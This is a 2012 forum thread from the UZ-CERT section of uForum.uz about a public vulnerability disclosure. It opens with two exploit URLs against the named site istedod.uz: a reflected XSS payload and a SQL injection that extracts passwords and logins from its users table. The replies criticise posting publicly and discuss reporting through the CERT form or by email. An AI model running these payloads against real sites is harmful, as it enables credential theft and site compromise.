uForum.uz

uForum.uz (https://uforum.uz/index.php)
-   UZ-CERT (https://uforum.uz/forumdisplay.php?f=494)
-   -   istedod.uz - XSS, SQL injection (https://uforum.uz/showthread.php?t=18440)

insider 23.08.2012 23:15

istedod.uz - XSS, SQL injection
 
Код:

http://istedod.uz/?page&pid=8--%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
Код:

http://istedod.uz/?page&pid=8%20and%201=0%20union%20select%201,parol,3,login%20from%20users%20--

Abdurohman 24.08.2012 02:51

insider, Вы сообщили сперва владельцу сайта?!

Dmitry Paleev 24.08.2012 09:43

Цитата:

Сообщение от insider (Сообщение 786636)
Код:

http://istedod.uz/?page&pid=8--%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
Код:

http://istedod.uz/?page&pid=8%20and%201=0%20union%20select%201,parol,3,login%20from%20users%20--

Было бы лучше, если бы Вы сообщали напрямую владельцам, либо в Службу UZ-CERT об обнаруженных угрозах на веб-сайтах в доменой зоне .UZ Публичное размещение уязвимостей, может повлечь за собой возможные взломы и компрометацию этих ресурсов, что может неблагоприятно сказаться на их работе.

Eldar Ishimbaev 24.08.2012 09:47

Цитата:

Сообщение от Dmitry Paleev (Сообщение 786724)
Публичное размещение уязвимостей, может повлечь за собой возможные взломы и компрометацию этих ресурсов

Ну или проблемы для того, кто разместил данную информацию.

insider 25.08.2012 08:21

Цитата:

Сообщение от Dmitry Paleev (Сообщение 786724)
Публичное размещение уязвимостей, может повлечь за собой

немедленное исправление недостатков.

Цитата:

Сообщение от Dmitry Paleev (Сообщение 786724)
либо в Службу UZ-CERT

http://cert.uz/incident/
а если я не собираюсь сообщать Место работы,Телефоны и всякую инфу ?

insider 25.08.2012 08:31

при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.

Dmitry Paleev 25.08.2012 12:08

Цитата:

Сообщение от insider (Сообщение 787154)
Цитата:

Сообщение от Dmitry Paleev (Сообщение 786724)
Публичное размещение уязвимостей, может повлечь за собой

немедленное исправление недостатков.

Цитата:

Сообщение от Dmitry Paleev (Сообщение 786724)
либо в Службу UZ-CERT

http://cert.uz/incident/
а если я не собираюсь сообщать Место работы,Телефоны и всякую инфу ?

Если Вы не хотите сообщать данную информацию, можете отправить анонимное сообщение, указав вымышленные данные, либо написать на почтовый ящик cert@uzinfocom.uz.

Dmitry Paleev 25.08.2012 12:09

Цитата:

Сообщение от insider (Сообщение 787156)
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.

Проверили, форма работает, сообщение об инциденте отправляется и приходит. Видимо Вы некорректно заполнили некоторые поля.

insider 28.08.2012 10:20

Цитата:

Сообщение от Dmitry Paleev (Сообщение 787208)
Цитата:

Сообщение от insider (Сообщение 787156)
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.

Проверили, форма работает, сообщение об инциденте отправляется и приходит. Видимо Вы некорректно заполнили некоторые поля.

При отправке

Тема сообщения: freshmusic.uz - XSS
Ваше имя: insider
Место работы: ХХХ
Должность: ХХХ
Телефон, факс: 222-55-66
Электронная почта: aaa@aa.aa
Просим вас указать ... :
Код:

http://freshmusic.uz/abc.php?type= << XSS >>
Возникает ошибка.

Возможно стоит фильтр POST данных которая реагирует на некоторые ключевые слова.

Dmitry Paleev 28.08.2012 12:45

Цитата:

Сообщение от insider (Сообщение 788472)
Цитата:

Сообщение от Dmitry Paleev (Сообщение 787208)
Цитата:

Сообщение от insider (Сообщение 787156)
при отправке данных в
http://cert.uz/incident/
возникает ошибка

Method Not Implemented

POST to /incident/send.php not supported.

Проверили, форма работает, сообщение об инциденте отправляется и приходит. Видимо Вы некорректно заполнили некоторые поля.

При отправке

Тема сообщения: freshmusic.uz - XSS
Ваше имя: insider
Место работы: ХХХ
Должность: ХХХ
Телефон, факс: 222-55-66
Электронная почта: aaa@aa.aa
Просим вас указать ... :

Возникает ошибка.

Возможно стоит фильтр POST данных которая реагирует на некоторые ключевые слова.

Вы правы, стоит фильтрация. В форме блокируется передача опасных символов. В случае, если вы хотите оповестить о наличии уязвимостей типа SQL, PHP, XSS с отправкой кода самой уязвимости, в этом случае рекомендуется писать на электронную почту cert@uzinfocom.uz.


Текущее время: 03:32. Часовой пояс GMT +5.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
OOO «Единый интегратор UZINFOCOM»